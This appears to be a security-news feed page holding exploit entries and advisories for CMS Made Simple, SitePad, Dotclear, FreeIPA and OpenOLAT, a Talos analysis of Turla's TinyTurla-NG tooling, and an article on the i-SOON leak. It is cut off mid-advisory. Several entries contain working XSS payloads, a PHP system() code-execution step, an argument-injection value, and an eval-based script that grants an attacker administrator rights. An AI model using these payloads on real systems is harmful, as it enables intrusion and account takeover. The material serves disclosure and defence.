CMS Made Simple version 2.2.19 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: CMS Made Simple Version: 2.2.19 - Stored XSS# Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://www.cmsmadesimple.org/# Version: 2.2.19# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple1 ) log in as admin and go to Content > File Manager 2 ) Write in New directory: place payload "><img src=x onerrora=confirm() onerror=confirm(1)>3 ) After click run you will be see alertbox

CMS Made Simple 2.2.19 Cross Site Scripting

CMS Made Simple version 2.2.19 suffers from a remote code execution vulnerability.

    # Exploit Title: CMS Made Simple Version: 2.2.19 - Remote Code Execution# Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://www.cmsmadesimple.org/# Version: 2.2.19# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple1 ) log in as admin and go to Extensions > User Defined Tags >2 ) Write in Code place payload > <?php echo system('id'); ?>3 ) After click run you will be see result :uid=1000(admin) gid=1000(admin) groups=1000(admin) uid=1000(admin) gid=1000(admin) groups=1000(admin)

CMS Made Simple 2.2.19 Remote Code Execution

SitePad version 1.8.2 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: SitePad Version : 1.8.2 - Stored XSS # Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://sitepad.com/# Version : 1.8.2# Tested on: https://www.softaculous.com/apps/blogs/SitePad1 ) Go to Templates > Header > Edit Pagelayer Template2 ) Write in Name : "><img src=x onerrora=confirm() onerror=confirm(1)>3) After save and refresh page will be see alert button https://127.0.0.1/SitePad/site-admin/admin.php?page=pagelayer_template_wizard&post=9

SitePad 1.8.2 Cross Site Scripting

Dotclear version 2.29 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Dotclear Version : 2.29 - Reflected XSS # Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage: https://dotclear.org/# Version : 2.29# Tested on: https://softaculous.com/demos/dotclear1 ) Enter admin panel after write search button this payload : "><img src=x onerrora=confirm() onerror=confirm(1)>2 ) https://127.0.0.1/Dotclear/admin/index.php?qx="><img src=x onerrora=confirm() onerror=confirm(1)>&process=Search3 ) You will be see alert button

Dotclear 2.29 Cross Site Scripting

Red Hat Security Advisory 2024-0934-03 - An update is now available for Red Hat Virtualization 4 Tools for Red Hat Enterprise Linux 8, Red Hat Virtualization 4 for Red Hat Enterprise Linux 8, and Red Hat Virtualization Engine 4.4. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0934.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Virtualization security and bug fix updateAdvisory ID:        RHSA-2024:0934-03Product:            Red Hat VirtualizationAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0934Issue date:         2024-02-21Revision:           03CVE Names:          CVE-2024-0822====================================================================Summary: An update is now available for Red Hat Virtualization 4 Tools for Red Hat Enterprise Linux 8, Red Hat Virtualization 4 for Red Hat Enterprise Linux 8,  and Red Hat Virtualization Engine 4.4.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Security fixes:  * ovirt: authentication bypass (CVE-2024-0822)Bug fixes: * During the storage domain import, the engine will fail to find OVF_STORE if there is also a ConnectStoragePoolVDSCommand request (BZ#2244641)Solution:https://access.redhat.com/articles/2974891CVEs:CVE-2024-0822References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2244641https://bugzilla.redhat.com/show_bug.cgi?id=2258509

Red Hat Security Advisory 2024-0934-03

A new data leak that appears to have come from one of China's top private cybersecurity firms provides a rare glimpse into the commercial side of China's many state-sponsored hacking groups. Experts say the leak illustrates how Chinese government agencies increasingly are contracting out foreign espionage campaigns to the nation's burgeoning and highly competitive cybersecurity industry.

A new data leak that appears to have come from one of China’s top private cybersecurity firms provides a rare glimpse into the commercial side of China’s many state-sponsored hacking groups. Experts say the leak illustrates how Chinese government agencies increasingly are contracting out foreign espionage campaigns to the nation’s burgeoning and highly competitive cybersecurity industry.

A marketing slide deck promoting i-SOON’s Advanced Persistent Threat (APT) capabilities.

A large cache of more than 500 documents published to GitHub last week indicate the records come from **i-SOON**, a technology company headquartered in Shanghai that is perhaps best known for providing cybersecurity training courses throughout China. But the leaked documents, which include candid employee chat conversations and images, show a less public side of i-SOON, one that frequently initiates and sustains cyberespionage campaigns commissioned by various Chinese government agencies.

The leaked documents suggest i-SOON employees were responsible for a raft of cyber intrusions over many years, infiltrating government systems in the United Kingdom and countries throughout Asia. Although the cache does not include raw data stolen from cyber espionage targets, it features numerous documents listing the level of access gained and the types of data exposed in each intrusion.

Security experts who reviewed the leaked data say they believe the information is legitimate, and that i-SOON works closely with China’s Ministry of Public Security and the military. In 2021, the Sichuan provincial government named i-SOON as one of “the top 30 information security companies.”

“The leak provides some of the most concrete details seen publicly to date, revealing the maturing nature of China’s cyber espionage ecosystem,” said **Dakota Cary**, a China-focused consultant at the security firm **SentinelOne**. “It shows explicitly how government targeting requirements drive a competitive marketplace of independent contractor hackers-for-hire.”

Mei Danowski is a former intelligence analyst and China expert who now writes about her research in a Substack publication called Natto Thoughts. Danowski said i-SOON has achieved the highest secrecy classification that a non-state-owned company can receive, which qualifies the company to conduct classified research and development related to state security.

i-SOON’s “business services” webpage states that the company’s offerings include public security, anti-fraud, blockchain forensics, enterprise security solutions, and training. Danowski said that in 2013, i-SOON established a department for research on developing new APT network penetration methods.

APT stands for Advanced Persistent Threat, a term that generally refers to state-sponsored hacking groups. Indeed, among the documents apparently leaked from i-SOON is a sales pitch slide boldly highlighting the hacking prowess of the company’s “APT research team” (see screenshot above).

i-SOON CEO Wu Haibo, in 2011. Image: nattothoughts.substack.com.

The leaked documents included a lengthy chat conversation between the company’s founders, who repeatedly discuss flagging sales and the need to secure more employees and government contracts. Danowski said the CEO of i-SOON, **Wu Haibo** (“Shutdown” in the leaked chats) is a well-known first-generation red hacker or “Honker,” and an early member of Green Army — the very first Chinese hacktivist group founded in 1997. Mr. Haibo has not yet responded to a request for comment.

In October 2023, Danowski detailed how i-SOON became embroiled in a software development contract dispute when it was sued by a competing Chinese cybersecurity company called **Chengdu 404**. In September 2021, the **U.S. Department of Justice** unsealed indictments against multiple Chengdu 404 employees, charging that the company was a facade that hid more than a decade’s worth of cyber intrusions attributed to a threat actor group known as “APT 41.”

Danowski said the existence of this legal dispute suggests that Chengdu 404 and i-SOON have or at one time had a business relationship, and that one company likely served as a subcontractor to the other.

“From what they chat about we can see this is a very competitive industry, where companies in this space are constantly poaching each others’ employees and tools,” Danowski said. “The infosec industry is always trying to distinguish \[the work\] of one APT group from another. But that’s getting harder to do.”

It remains unclear if i-SOON’s work has earned it a unique APT designation. But **Will Thomas**, a cyber threat intelligence researcher at Equinix, found an Internet address in the leaked data that corresponds to a domain flagged in a 2019 Citizen Lab report about one-click mobile phone exploits that were being used to target groups in Tibet. The 2019 report referred to the threat actor behind those attacks as an APT group called **Poison Carp.**

Several images and chat records in the data leak suggest i-SOON’s clients periodically gave the company a list of targets they wanted to infiltrate, but sometimes employees confused the instructions. One screenshot shows a conversation in which an employee tells his boss they’ve just hacked one of the universities on their latest list, only to be told that the victim in question was not actually listed as a desired target.

The leaked chats show i-SOON continuously tried to recruit new talent by hosting a series of hacking competitions across China. It also performed charity work, and sought to engage employees and sustain morale with various team-building events.

However, the chats include multiple conversations between employees commiserating over long hours and low pay. The overall tone of the discussions indicates employee morale was quite low and that the workplace environment was fairly toxic. In several of the conversations, i-SOON employees openly discuss with their bosses how much money they just lost gambling online with their mobile phones while at work.

Danowski believes the i-SOON data was probably leaked by one of those disgruntled employees.

“This was released the first working day after the Chinese New Year,” Danowski said. “Definitely whoever did this planned it, because you can’t get all this information all at once.”

SentinelOne’s Cary said he came to the same conclusion, noting that the Protonmail account tied to the GitHub profile that published the records was registered a month before the leak, on January 15, 2024.

China’s much vaunted Great Firewall not only lets the government control and limit what citizens can access online, but this distributed spying apparatus allows authorities to block data on Chinese citizens and companies from ever leaving the country.

As a result, China enjoys a remarkable information asymmetry vis-a-vis virtually all other industrialized nations. Which is why this apparent data leak from i-SOON is such a rare find for Western security researchers.

“I was so excited to see this,” Cary said. “Every day I hope for data leaks coming out of China.”

That information asymmetry is at the heart of the Chinese government’s cyberwarfare goals, according to a 2023 analysis by **Margin Research** performed on behalf of the **Defense Advanced Research Projects Agency** (DARPA).

“In the area of cyberwarfare, the western governments see cyberspace as a ‘fifth domain’ of warfare,” the Margin study observed. “The Chinese, however, look at cyberspace in the broader context of information space. The ultimate objective is, not ‘control’ of cyberspace, but control of information, a vision that dominates China’s cyber operations.”

The National Cybersecurity Strategy issued by the White House last year singles out China as the biggest cyber threat to U.S. interests. While the United States government does contract certain aspects of its cyber operations to companies in the private sector, it does not follow China’s example in promoting the wholesale theft of state and corporate secrets for the commercial benefit of its own private industries.

**Dave Aitel**, a co-author of the Margin Research report and former computer scientist at the **U.S. National Security Agency**, said it’s nice to see that Chinese cybersecurity firms have to deal with all of the same contracting headaches facing U.S. companies seeking work with the federal government.

“This leak just shows there’s layers of contractors all the way down,” Aitel said. “It’s pretty fun to see the Chinese version of it.”

New Leak Shows Business Side of China’s APT Menace

Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.

*   Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.

*   One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.

*   Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.

Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.

**C2 server analysis**

The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.

On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.

It will base64 decode the value of the $\_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell\_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.

C2 script’s web shell capability.

If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:

*   "**task**": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/\_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. This mechanism is used by the attackers to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.

*   "**gettask**": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.

*   "**result**": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.

*   "**getresult**": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.

*   "**file**" + "**name**": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.

*   "**cat\_file**": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.

*   "**rm\_file**": Remove/delete a file specified by the requestor from the C2 server.

The C2 script’s request handling logic.

The HTTP form values accepted by the C2 server “task”, “cat\_file”, “rm\_file”, “get\_result” and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, _from a remote location_, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.

This tactic can be visualized as:

**Instrumenting TinyTurla-NG to carry out post-compromise activity**

The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:

*   **Reconnaissance commands:** Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.

PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.

*   **Copy file commands:** Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\\windows\\temp\\

PowerShell script copies files to an intermediate location.  

*   **Exfiltration** **commands/scripts aka TurlaPower-NG:** These scripts were used to finally exfiltrate the selected files to the C2 servers.

The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.

While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:

*   Chisel: Modified copy of the Chisel client/agent.

*   Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.

*   Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.

The overall infection activity once TTNG has been deployed looks like this:

**Using Chisel as another means of persistent access**

Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\\Windows\\System32\\TrustedWorker\[.\]exe

The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks

In the proxy:

*   **“R”:** Stands for remote port forwarding.
*   **“5000”**: This is the port on the attacker machine that receives the connection from the infected system.
*   **“socks”**: Specifies the usage of the SOCKS protocol. 

(The default local host and port for a socks remote in Chisel is 127\[.\]0\[.\]0\[.\]1:1080)

The C2 server that the chisel sample contacts is: 91\[.\]193\[.\]18\[.\]120:443.

The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid from between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named as “dropher\[.\]com” and the subject name is “blum\[.\]com”.

TLS Certificate for the chisel malware used by Turla. 

During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it's unclear if this was a mistake or they intended for the certificate to be used on another modified chisel implant. 

Certificate issuer DN.

The new certificate has the same issuer but in this case, the common name is _blum\[.\]com_ and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.

Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.

The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd\[.\]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.

The tool contains the embedded cmd\[.\]exe command line.

The second tool discovered by Talos is a PowerShell script residing at the location:

C:\\windows\\system32\\edgeparser.ps1

This script is used to find  login data from Microsoft Edge located at:

%userprofile%\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data

This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\\windows\\temp\\<filename>.zip

The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:

%userprofile%\\AppData\\Local\\Microsoft\\Edge

PowerShell script obtaining key and login data to add to the archive for exfiltration.

TTNG uses the privilege elevation tool to run the PowerShell script using the command:

"C:\\Windows\\System32\\i.exe" \_PID\_ "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

This results in the tool spawning a new process with the command line:

C:\\Windows\\System32\\cmd.exe /c "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCS**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40  
ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc  
13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346  
b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

**IP Addresses**

91\[.\]193\[.\]18\[.\]120

TinyTurla-NG in-depth tooling and command and control analysis

FreeIPA version 4.10.1 has an issue where specially crafted HTTP requests potentially lead to denial of service or data exposure.

    Summary:Specially crafted HTTP requests can read files in the DC server. And use keytab files for authorization for different kerberos principals.Tested FreeIPA version:ipa-server-4.10.1DetailsThe "user" parameter in the HTTP URI "/sip/session/login_password" is inserted into the "run" function from the file "ipautil.py". Then it is passed as an argument to the "subprocess.Popen". As a result, the following list is passed: "args=['/usr/bin/kinit', '{user params}', '-c', /run/ipa/ccaches/kinit_13704', '-T', '/run/ipa/ccaches/armor_13704', '-C', '-E']". If instead of "{user params}" there is a string "-V", then it will be taken as an argument for "kinit". As a result, remote attackers can use options such as "-t", "-X", "-S" or "-I" for DOS, or use the keytab file from the system to log in under participants without a password.PoC (attached screenshots):Simple request with "user=-H&password=0000000"With multiple parameters "user=-Vkt&password=0000000"ImpactPossible DOS, use keytab from system and read files on DC.

FreeIPA 4.10.1 Denial Of Service / Information Disclosure

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current 3.x.x release.

**Botan C++ Crypto Algorithms Library 3.3.0**

Posted Feb 21, 2024

Site botan.randombit.net

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current 3.x.x release.

Changes: Fixed a potential denial of service caused by accepting arbitrary length primes as potential elliptic curve parameters in ASN.1 encodings. Added FrodoKEM post-quantum KEM. Added support for Blake2s. Added support for RFC 7250 in TLS 1.3 to allow authenticating peers using raw public keys. 43 additional changes and additions.

tags | library

SHA-256 | 368f11f426f1205aedb9e9e32368a16535dc11bd60351066e6f6664ec36b85b9

Download | Favorite | View

Botan C++ Crypto Algorithms Library 3.3.0

OpenOLAT versions 18.1.4 and below and versions 18.1.5 and below suffer from multiple persistent cross site scripting vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20240220-0 >  
=======================================================================  
               title: Multiple Stored Cross-Site Scripting Vulnerabilities  
             product: OpenOLAT (Frentix GmbH)  
  vulnerable version: <= 18.1.4 and <= 18.1.5  
       fixed version: 18.1.6 / 18.2  
          CVE number: CVE-2024-25973, CVE-2024-25974  
              impact: High  
            homepage: https://www.openolat.com/  
               found: 2023-12-20 and 2024-01-20  
                  by: Mike Klostermaier (Office Berlin)  
                      Johannes Völpel (Office Berlin)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"frentix operates in the areas of e-learning, software development, multimedia  
and media production. Providing information and lasting impressions – we  
try to reconcile this goal in the area of tension between technology, usability  
and design."

"The LMS OpenOlat is an internet-based learning platform for teaching, learning,  
assessment and communication, an LMS, a learning management system."

Source: https://www.openolat.com/unternehmen/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)  
Insufficient filtering and sanitization of user input leads to the creation  
of groups, courses and other resources that contain XSS payloads.  
This allows an attacker to execute JavaScript code with the permissions of the  
victim in the context of the user's browser.

2) Privilege escalation via XSS due to insecure CSP  
If the content security policy is not set securely and there is content on  
the same page that can be manipulated by the attacker, a privilege  
escalation can take place.

3) Stored Cross-Site-Scripting within the Media Center (CVE-2024-25974)  
Insufficient filtering and sanitization of malicious files uploaded by a user  
leads to stored resources within the Media Center that could contain XSS payloads.  
This allows an attacker to execute JavaScript code with the permissions of the  
victim in the context of the user's browser.

Proof of concept:  
-----------------  
1) Multiple Stored Cross-Site-Scripting Vulnerabilities (CVE-2024-25973)  
Various XSS issues have been found in different functions of OpenOLAT.  
The following examples show different attack scenarios.

Example 1 - Stored Cross-Site-Scripting within Coursenames  
Due to insufficient filtering and sanitization of user input, an attacker  
with rights to create or edit groups can create a course with a name that  
contains an XSS payload. When a user edits this course the name including  
the payload is displayed and executed. Furthermore, the XSS payload is  
executed when editing the course via the course-editor, within the course-editor's  
"layout" tab inside the preview. This also happens multiple times at multiple  
locations during the publishing workflow.

The following payload was used as coursename:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```

Example 2 - Stored Cross-Site-Scripting within Catalogname  
An attacker, who is authenticated with rights that allow creating or renaming  
catalogs, is able to create a catalog (also called sub-category) with a name that  
contains an XSS payload due to insufficient filtering and sanitization of user  
input.  
When a user publishes a course, the name of the catalog including the  
payload is displayed and executed within the "Create catalog entry" tab  
when selecting "Add to catalog".

The following payload was used as the catalog name:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```

Example 3 - Stored Cross-Site-Scripting within Curriculum Management  
An authenticated user of a role, who has the authorization to create  
curriculums, is able to create curriculums, whose name contains a JavaScript  
payload. These are shown to the members in some views where the JavaScript  
payload is executed. To do this, navigate to the overview of the curriculums  
via "Curriculum management".  
A curriculum can be created via the "Create new curriculum" button in the  
window that appears. To recreate the vulnerability, it is sufficient to  
enter a JavaScript payload as the identifier.

The following payload was used as curriculum name:  
```  
<img src=x onerror=alert('from\u0020subcat\u0020title')>  
```  
When a user with sufficient rights opens the manipulated curriculum via the  
"curriculum browser" within the "Curriculum management" the payload within  
the curriculum name gets executed within the context of the user's browser.

Example 4 - Stored Cross-Site-Scripting within Alt-Text of Media-Files  
An attacker, who is authenticated with rights that allow uploading files,  
can upload media files via the "Media Centre" and enter metadata for these  
files. One of the fields used for image metadata is the so-called alt-text  
field, which is used to enter an alternative display text for image files.  
This alternative text is not sanitized properly when entered during the upload  
of files.

The following payload was assigned to an image file as alt-text:  
```  
"><img src=a onerror=alert(document.location)>  
```

The upload of the image file works without further problems and is confirmed.  
After successfully uploading the image with a manipulated alt-text, the  
transmitted payload is executed directly. Using the function to share content  
with other users, this manipulated image can be shared to potential victims  
(e.g. a system administrator). The user to whom the image has been shared with  
can preview it in their media center. As soon as the user views the image details,  
the JavaScript payload stored within the alt-text is executed in the context  
of the victim's browser.

2) Privilege escalation due to unsafe-eval  
If the content security policy is not set securely and there is content on the  
same page that can be manipulated by the attacker, a privilege escalation  
can take place. As the content security policy is set to "Report-Only" and  
"unsafe-eval" is set by default in OpenOLAT, it can be possible to use the  
following attack at least in most cases shown here using stored XSS.

An example that loads a script from an external source was not used here,  
as this would not have been possible with an activated CSP, whereas this  
vulnerability can also be exploited with an activated standard CSP from  
OpenOLAT.  
The following example can be used at any given point where a XSS is possible  
and another string can be manipulated within a readable context:  
```  
"><img src=x onerror='var ps = document.querySelectorAll(`p`); for (var i = 0; i  
< ps.length; i++) { var c = ps[i].textContent; if (c.startsWith(`YXN`))  
{ eval(atob(c)); } }'  
```

This JavaScript code searches the website for elements that begin  
with a certain string (in our example "YXN"), decodes them from base64 and  
executes them (due to the unsafe-eval policy) as JavaScript code.  
This has been tested to be working with example 4 with the above payload  
as the alt-text and the payload mentioned below as the description of the  
media file.  
The string "YXN" is the start of the base64-encoded following payload:  
```  
async function main() {  
     function sleep(ms) {  
         return new Promise(resolve => setTimeout(resolve, ms));  
     }  
     var n = 2000;  
     var anchorElement = document.querySelector('a[title="Manage users and system groups"]');  
  anchorElement.click();  
     await sleep(n);  
     var buttons = document.querySelectorAll('a[title="Organisations"]');  
     buttons[0].click();  
     await sleep(n);  
     var links = document.querySelectorAll('a');  
     var organisationLink = Array.from(links).find(function (link) {  
         return link.textContent === 'OpenOLAT';  
     });  
     organisationLink.click();  
     await sleep(n);  
     var links = document.querySelectorAll('a');  
     var chadLink = Array.from(links).find(function (link) {  
         return link.textContent === 'Chad';  
     });  
     await sleep(n);  
     chadLink.click();  
     await sleep(n);  
     var roleTabLinks = document.querySelectorAll('a[role="tab"]');  
     var rolesLink = Array.from(roleTabLinks).find(function (link) {  
         return link.textContent === 'Roles';  
     });  
     await sleep(n);  
     rolesLink.click();  
     await sleep(n);  
     var inputElement = document.querySelector('input[value="administrator"]');  
     inputElement.click();  
     await sleep(n);  
     var inputElement = document.querySelector('input[value="sysadmin"]');  
     inputElement.click();  
     await sleep(n);  
     var saveButton = document.querySelector('button[value="Save"]');  
     saveButton.click();  
}  
main();  
```

The code shown here utilizes the static structure of OpenOLAT. The use of  
control elements is predictable, as long as the name of the organization used  
within the OpenOLAT instance is known. This information is freely accessible to  
every logged-in user. Lines 14 and 20 contain variables which must be adapted  
to the corresponding OpenOLAT instance and attacker username. The executed  
script searches for HTML elements with predictable names in order to navigate  
to an administrative interface within the application and elevate the  
attacker's rights to administrative level.

The script works with two-second pauses between the individual actions  
to ensure that all actions are only executed after the page has loaded. Even  
if this is visible to the victim, the waiting times between the actions can be  
optimized in a real attack and can also be used with the help of obfuscation  
measures (e.g. additional windows that open and hide the actions).

3) Stored Cross-Site-Scripting (XSS) within the Media-Center (CVE-2024-25974)  
It is possible to upload files within the Media Center of OpenOLAT version 18.1.5  
as an authenticated user without any other rights.  
While the filetypes are limited, an SVG containing an XSS payload can be  
uploaded. The following content has been uploaded within a file  
named 'xss.svg':  
```  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<script type="text/javascript">  
     alert(document.location);  
</script>  
</svg>  
```

After a successful upload the file can be shared with groups of users.  
By sharing the file with a group of which an administrator is part of, the  
